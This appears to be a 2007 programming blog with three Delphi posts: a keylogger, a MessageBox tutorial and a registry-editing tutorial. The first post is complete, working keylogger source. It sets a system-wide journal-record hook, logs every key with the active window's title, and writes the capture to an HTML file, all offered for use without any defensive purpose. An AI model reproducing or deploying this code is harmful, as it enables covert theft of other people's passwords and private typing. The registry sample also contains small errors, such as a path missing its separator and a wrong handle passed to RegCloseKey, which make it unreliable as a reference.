Simple keylogger in Delphi

March 30, 2007
(******************************************************)
(*                                                    *)
(*        Very Simple Local Keylogger                 *)
(*                                                    *)
(*        See: http://mo4x.com/                       *)
(*                                                    *)
(******************************************************)

unit KeyloggerUnit;

interface

uses
  Windows, Messages, SysUtils, Variants, Controls, Forms, Dialogs,
  StdCtrls, ExtCtrls, Buttons, Classes;

type
  TMainForm = class(TForm)
    Memo: TMemo;
    btnUpdateLogfile: TSpeedButton;
    btnClearLogs: TSpeedButton;
    FinalMemo: TMemo;
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure btnUpdateLogfileClick(Sender: TObject);
    procedure btnClearLogsClick(Sender: TObject);
  end;

var
  MainForm: TMainForm;
  MainHook : HHOOK;
  Wnd1,Wnd2 : array[0..255] of char;

implementation

{$R *.dfm}

function KeyboardHook(Code: Integer; wParam : WPARAM;
  lParam : LPARAM): Longint; stdcall;
var
  Buffer : TEventMsg;

  procedure TranslateKey(Key : Byte);
  begin
    if (Key <> VK_LBUTTON) and (Key <> VK_RBUTTON) then
    begin
      GetWindowText(GetForegroundWindow, Wnd2, SizeOf(Wnd2));
      if wnd1 <> wnd2 then
    begin
      MainForm.Memo.Lines.Add('<hr><font color="#FFFFFF"><b>'+wnd2+'</b></font><br>');
      Wnd1 := Wnd2;
    end;
    end;
    with MainForm do
    begin
      case Key of
        VK_RETURN      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Enter]</b><br></font>');
        VK_BACK        :    Memo.Lines.Add('<font color="#FFFF00"><b>[Backspace]</b></font>');
        VK_ESCAPE      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Esc]</b></font>');
        VK_SHIFT       :    Memo.Lines.Add('<font color="#FFFF00"><b>[Shift]</b></font>');
        VK_MENU        :    Memo.Lines.Add('<font color="#FFFF00"><b>[Alt]</b></font>');
        VK_CONTROL     :    Memo.Lines.Add('<font color="#FFFF00"><b>[Ctrl]</b></font>');
        VK_DELETE      :    Memo.Lines.Add('<font color="#FFFF00"><b>[Delete]</b></font>');
        VK_SPACE       :    Memo.Lines.Add(' ');
        VK_MULTIPLY    :    Memo.Text := Memo.Text + '<font color="#FF0000">*</font>';
        VK_ADD         :    Memo.Text := Memo.Text + '<font color="#FF0000">+</font>';
        VK_SUBTRACT    :    Memo.Text := Memo.Text + '<font color="#FF0000">-</font>';
        VK_DECIMAL     :    Memo.Text := Memo.Text + '<font color="#FF0000">.</font>';
        VK_DIVIDE      :    Memo.Text := Memo.Text + '<font color="#FF0000">/</font>';
        188            :    Memo.Text := Memo.Text + '<font color="#FF0000">,</font>';
        192            :    Memo.Text := Memo.Text + '<font color="#FF0000">`</font>';
        222            :    Memo.Text := Memo.Text + '<font color="#FF0000">'+Chr(39)+'</font>';
        220            :    Memo.Text := Memo.Text + '<font color="#FF0000"></font>';
        219            :    Memo.Text := Memo.Text + '<font color="#FF0000">[</font>';
        221            :    Memo.Text := Memo.Text + '<font color="#FF0000">]</font>';
        186            :    Memo.Text := Memo.Text + '<font color="#FF0000">;</font>';
        191            :    Memo.Text := Memo.Text + '<font color="#FF0000">/</font>';
        190            :    Memo.Text := Memo.Text + '<font color="#FF0000">.</font>';
        44             :    Memo.Text := Memo.Text + '<font color="#FF0000">,</font>';
        187            :    Memo.Text := Memo.Text + '<font color="#FF0000">=</font>';
        189            :    Memo.Text := Memo.Text + '<font color="#FF0000">-</font>';
        65             :    Memo.Text := Memo.Text + '<font color="#0000FF">a</font>';
        66             :    Memo.Text := Memo.Text + '<font color="#0000FF">b</font>';
        67             :    Memo.Text := Memo.Text + '<font color="#0000FF">c</font>';
        68             :    Memo.Text := Memo.Text + '<font color="#0000FF">d</font>';
        69             :    Memo.Text := Memo.Text + '<font color="#0000FF">e</font>';
        70             :    Memo.Text := Memo.Text + '<font color="#0000FF">f</font>';
        71             :    Memo.Text := Memo.Text + '<font color="#0000FF">g</font>';
        72             :    Memo.Text := Memo.Text + '<font color="#0000FF">h</font>';
        73             :    Memo.Text := Memo.Text + '<font color="#0000FF">i</font>';
        74             :    Memo.Text := Memo.Text + '<font color="#0000FF">j</font>';
        75             :    Memo.Text := Memo.Text + '<font color="#0000FF">k</font>';
        76             :    Memo.Text := Memo.Text + '<font color="#0000FF">l</font>';
        77             :    Memo.Text := Memo.Text + '<font color="#0000FF">m</font>';
        78             :    Memo.Text := Memo.Text + '<font color="#0000FF">n</font>';
        79             :    Memo.Text := Memo.Text + '<font color="#0000FF">o</font>';
        80             :    Memo.Text := Memo.Text + '<font color="#0000FF">p</font>';
        81             :    Memo.Text := Memo.Text + '<font color="#0000FF">q</font>';
        82             :    Memo.Text := Memo.Text + '<font color="#0000FF">r</font>';
        83             :    Memo.Text := Memo.Text + '<font color="#0000FF">s</font>';
        84             :    Memo.Text := Memo.Text + '<font color="#0000FF">t</font>';
        85             :    Memo.Text := Memo.Text + '<font color="#0000FF">u</font>';
        86             :    Memo.Text := Memo.Text + '<font color="#0000FF">v</font>';
        87             :    Memo.Text := Memo.Text + '<font color="#0000FF">w</font>';
        88             :    Memo.Text := Memo.Text + '<font color="#0000FF">x</font>';
        89             :    Memo.Text := Memo.Text + '<font color="#0000FF">y</font>';
        90             :    Memo.Text := Memo.Text + '<font color="#0000FF">z</font>';
        { Numpad Keys }
        VK_NUMPAD0     :    Memo.Text := Memo.Text + '<font color="#00FF00">0</font>';
        VK_NUMPAD1     :    Memo.Text := Memo.Text + '<font color="#00FF00">1</font>';
        VK_NUMPAD2     :    Memo.Text := Memo.Text + '<font color="#00FF00">2</font>';
        VK_NUMPAD3     :    Memo.Text := Memo.Text + '<font color="#00FF00">3</font>';
        VK_NUMPAD4     :    Memo.Text := Memo.Text + '<font color="#00FF00">4</font>';
        VK_NUMPAD5     :    Memo.Text := Memo.Text + '<font color="#00FF00">5</font>';
        VK_NUMPAD6     :    Memo.Text := Memo.Text + '<font color="#00FF00">6</font>';
        VK_NUMPAD7     :    Memo.Text := Memo.Text + '<font color="#00FF00">7</font>';
        VK_NUMPAD8     :    Memo.Text := Memo.Text + '<font color="#00FF00">8</font>';
        VK_NUMPAD9     :    Memo.Text := Memo.Text + '<font color="#00FF00">9</font>';
        { Numbers }
        48             :    Memo.Text := Memo.Text + '<font color="#00FF00">0</font>';
        49             :    Memo.Text := Memo.Text + '<font color="#00FF00">1</font>';
        50             :    Memo.Text := Memo.Text + '<font color="#00FF00">2</font>';
        51             :    Memo.Text := Memo.Text + '<font color="#00FF00">3</font>';
        52             :    Memo.Text := Memo.Text + '<font color="#00FF00">4</font>';
        53             :    Memo.Text := Memo.Text + '<font color="#00FF00">5</font>';
        54             :    Memo.Text := Memo.Text + '<font color="#00FF00">6</font>';
        55             :    Memo.Text := Memo.Text + '<font color="#00FF00">7</font>';
        56             :    Memo.Text := Memo.Text + '<font color="#00FF00">8</font>';
        57             :    Memo.Text := Memo.Text + '<font color="#00FF00">9</font>';
        //to capture other keys you must uncomment the line below:
        //else Memo.Text := Memo.Text + Chr(Key);
      end;
    end;
  end;

begin
  Result := 0;
  Buffer := PEventMsg(lParam)^;

  if Buffer.Message = WM_KEYUP then
  begin
    TranslateKey(Buffer.paramL);
  end;
end;

procedure TMainForm.FormCreate(Sender: TObject);
begin
  MainHook := SetWindowsHookEx(WH_JOURNALRECORD, KeyboardHook, hInstance, 0);
  DeleteFile('log.html');
end;

procedure TMainForm.FormDestroy(Sender: TObject);
begin
  UnhookWindowsHookEx(MainHook);
end;

procedure TMainForm.btnUpdateLogfileClick(Sender: TObject);
begin
  //save captured keystrokes to HTML file
  FinalMemo.Lines.Add('<body bgcolor="#000000">');
  FinalMemo.Lines.Add(Memo.Text);
  FinalMemo.Lines.SaveToFile('log.html');
  FinalMemo.Lines.Add('</body>');
  Memo.Clear;
end;

procedure TMainForm.btnClearLogsClick(Sender: TObject);
begin
  //clear the logs
  FinalMemo.Clear;
end;

end.

Delphi7 – MessageBox

March 30, 2007
program MsgBoxExample; //program name

uses
  SysUtils, //SysUtils module
  Windows,  //Windows module
  Messages; //Messages module

const
  sCaption = 'MsgBox'; //our const sCaption
var
  iReturnedValue : Integer; //our variable iReturnedValue (Integer)
begin
{
  MessageBox function creates, shows, operates (etc. :P) Message Box.
  You can use it to informate user about any errors, informations etc.
  It's very useful function in Windows Programming.

  MessageBox function returns following values:
  0 - out of memory
  1 - OK button clicked (IDOK)
  2 - Cancel button clicked (IDCANCEL)
  3 - Abort button clicked (IDABORT)
  4 - Retry button clicked (IDRETRY)
  5 - Ignore button clicked (IDIGNORE)
  6 - Yes button clicked (IDYES)
  7 - No button clicked  (IDNO)

  For example:
}

  iReturnedValue := MessageBoxA(0,'Choose "Yes" or "No" :)',sCaption,MB_YESNO);
  case iReturnedValue of
  6  :
      begin
        MessageBox(0,'You clicked "Yes"!!!',sCaption,0);
      end;

  7  :
      begin
        MessageBox(0,'You clicked "No"!!!',sCaption,0);
      end;
  end;

{
  Now I must tell you something about buttons and icons in our MsgBoxes.
  Buttons:
  MB_OK = $0
  MB_OKCANCEL = $1
  MB_ABORTRETRYIGNORE = $2
  MB_YESNOCANCEL = $3
  MB_YESNO = $4
  MB_RETRYCANCEL = $5
  So, you can use 0 or MB_OK, 4 or MB_YESNO etc.

  Above it's only general consts.
  There is more:
  MB_OK = $0
  MB_OKCANCEL = $1
  MB_ABORTRETRYIGNORE = $2
  MB_YESNOCANCEL = $3
  MB_YESNO = $4
  MB_RETRYCANCEL = $5
  MB_ICONHAND = $10
  MB_ICONQUESTION = $20
  MB_ICONEXCLAMATION = $30
  MB_ICONASTERISK = $40
  MB_USERICON	= $80
  MB_ICONERROR = MB_ICONHAND
  MB_ICONINFORMATION = MB_ICONASTERISK
  MB_ICONSTOP = MB_ICONHAND
  MB_ICONWARNING = MB_ICONEXCLAMATION
  MB_DEFBUTTON1 = $0
  MB_DEFBUTTON2 = $100
  MB_DEFBUTTON3 = $200
  MB_DEFBUTTON4 = $300
  MB_APPLMODAL = $0
  MB_SYSTEMMODAL = $1000
  MB_TASKMODAL = $2000
  MB_HELP	= $4000
  MB_NOFOCUS = $8000
  MB_SETFOREGROUND = $10000
  MB_DEFAULT_DESKTOP_ONLY = $20000
  MB_TYPEMASK = $0F
  MB_ICONMASK = $0F0
  MB_DEFMASK = $0F00
  MB_MODEMASK = $3000
  MB_MISCMASK = $0C000
  MB_TOPMOST = $40000
  MB_RIGHT = $80000
  MB_RTLREADING = $100000
  MB_SERVICE_NOTIFICATION = $200000
  Huh :)

  Little example:
}

  MessageBox(0,'Delphi lernen macht Spaß :)',sCaption,$3+$30+$100);

{
  In the example below we use:
  $3 = MB_YESNOCANCEL
  $30 = MB_ICONEXCLAMATION
  $100 = MB_DEFBUTTON2

  1. MB_YESNOCANCEL - our buttons is "Yes", "No", "Cancel".
  2. MB_ICONEXCLAMATION - our icon is warning icon
  3. MB_DEFBUTTON2 - default button, second btn will be "highlighted".

  But code with consts is more readable:
}
  MessageBox(0,'Simple Text ;)',sCaption,MB_YESNOCANCEL+MB_ICONEXCLAMATION+MB_DEFBUTTON2);

end. //end of the code

Delphi7 – Editing Windows Registry

March 30, 2007
program RegEditingExample;   //name of our proggy :)
 
uses
  SysUtils,         //SysUtils module declaration
  Windows,          //Windows module declaration
  Registry,         //Registry module declaration
  Dialogs;

var                 //below of this word are declarations of variables
  Reg : TRegistry;  //our first declared variable "Reg" (TRegistry)
  S : AnsiString;   //declaration of variable "S" (AnsiString)
  H : HKEY;         //declaration of variable "H" (hkey)

begin               //start of the code.

  //creating the class
  Reg := TRegistry.Create();

  //RootKey [property]
  //assigning HKEY_CURRENT_USER to property "RootKey".
  Reg.RootKey := HKEY_CURRENT_USER;

  //OpenKey [function]
  //key : String -> key name
  //CanCreate : Boolean -> if key isn't exist, function will create it.
  //Function opens specified key.
  //Return value is boolean.
  Reg.OpenKey('SoftwareMicrosoft',False);

  //CreateKey [function]
  //Key : String -> Registry Key Name.
  //Function creates new registry key.
  //If the function succeeds return value is "True" else function returns "False".
  Reg.CreateKey('Our_Reg_Key');

  //KeyExists [function]
  //Key : String -> Registry Key Name.
  //This function checks if the key is exists.
  //If key is exists then function returns 1 else function returns 0.
  Reg.KeyExists('Windows');

  //ValueExists [function]
  //Name : String -> name of the reg. value
  //Function checks if the value is already exists.
  //If value is exists then function returns 1 else function returns 0.
  Reg.ValueExists('lol2');

  //MoveKey [procedure]
  //OldName : String -> old registry key name
  //NewName : String -> new name of the registry key
  //Delete : Boolean -> if True the key with OldName will be deleted
  //This procedure moves/copies specified registry key (and it's subkeys and values!).
  Reg.MoveKey('Our_Reg_Key','Moved_Reg_Key',False);

  //DeleteKey [function]
  //Do you remember? Before we created 2 reg keys.
  //Now, we delete they by "DeleteKey" function
  //Key : String -> Name of the key (it will be deleted)
  //If the function succeeds return value is "True" else function returns "False".
  Reg.DeleteKey('Our_Reg_Key');
  Reg.DeleteKey('Moved_Reg_Key');

  //This property is holding the current path, for example: 'SoftwareMicrosoft'
  //In this example current path is assigned to variable "S".
  //To see the Path you can call "MessageBox" function
  //For example:
  //MessageBox(0,PChar('The current path is '+Reg.CurrentPath),'Info',MB_ICONINFORMATION);
  S := Reg.CurrentPath;

  //WinAPI Registry Functions
  //Don't know what is Windows API?
  //Let's look: http://en.wikipedia.org/wiki/WinAPI
  //Now I try to describe some WINAPI Registry Functions

  //RegOpenKey function
  //This function opens specified registry key.
  //hKey - handle to an open registry key
  //lpSubKey - name of the subkey
  //phkResult - pointer to a variable that receives handle to the opened key.
  //If the function succeeds, the return value is 0 (ERROR_SUCCESS)
  //If the function fails, the return value is nonzero (see WinError.h)
  //Example:
  RegOpenKey(HKEY_CURRENT_USER,'SoftwareMicrosoft',H);

  //RegCloseKey function
  //This function closes handle to the specified reg key.
  //hkey - handle to open registry key (it will be closed)
  //If the function succeeds, the return value is 0 (ERROR_SUCCESS)
  //If the function fails, the return value is nonzero (see WinError.h)
  //Example:
  RegCloseKey(HKEY_CURRENT_USER);

  //RegCreateKey function
  //This function creates new reg key,
  //but if key is already exists function opens it.
  //hKey - a handle to registry key
  //lpSubKey - subkey to create (or open)
  //phkResult - pointer to a variable that receives handle to the created/opened reg key
  //If the function succeeds, the return value is 0 (ERROR_SUCCESS)
  //If the function fails, the return value is nonzero (see WinError.h)
  //Example:
  RegCreateKey(HKEY_CURRENT_USER,'!Windows Registry Own3d ;)',H);

  //RegDeleteKey function
  //This function deletes specified reg key
  //hKey - a handle to registry key
  //lpSubKey - subkey to delete
  //If the function succeeds, the return value is 0 (ERROR_SUCCESS)
  //If the function fails, the return value is nonzero (see WinError.h)
  //Example:
  RegDeleteKey(HKEY_CURRENT_USER,'!Windows Registry Own3d ;)');

  //Dare for more!

end.   //end of the code.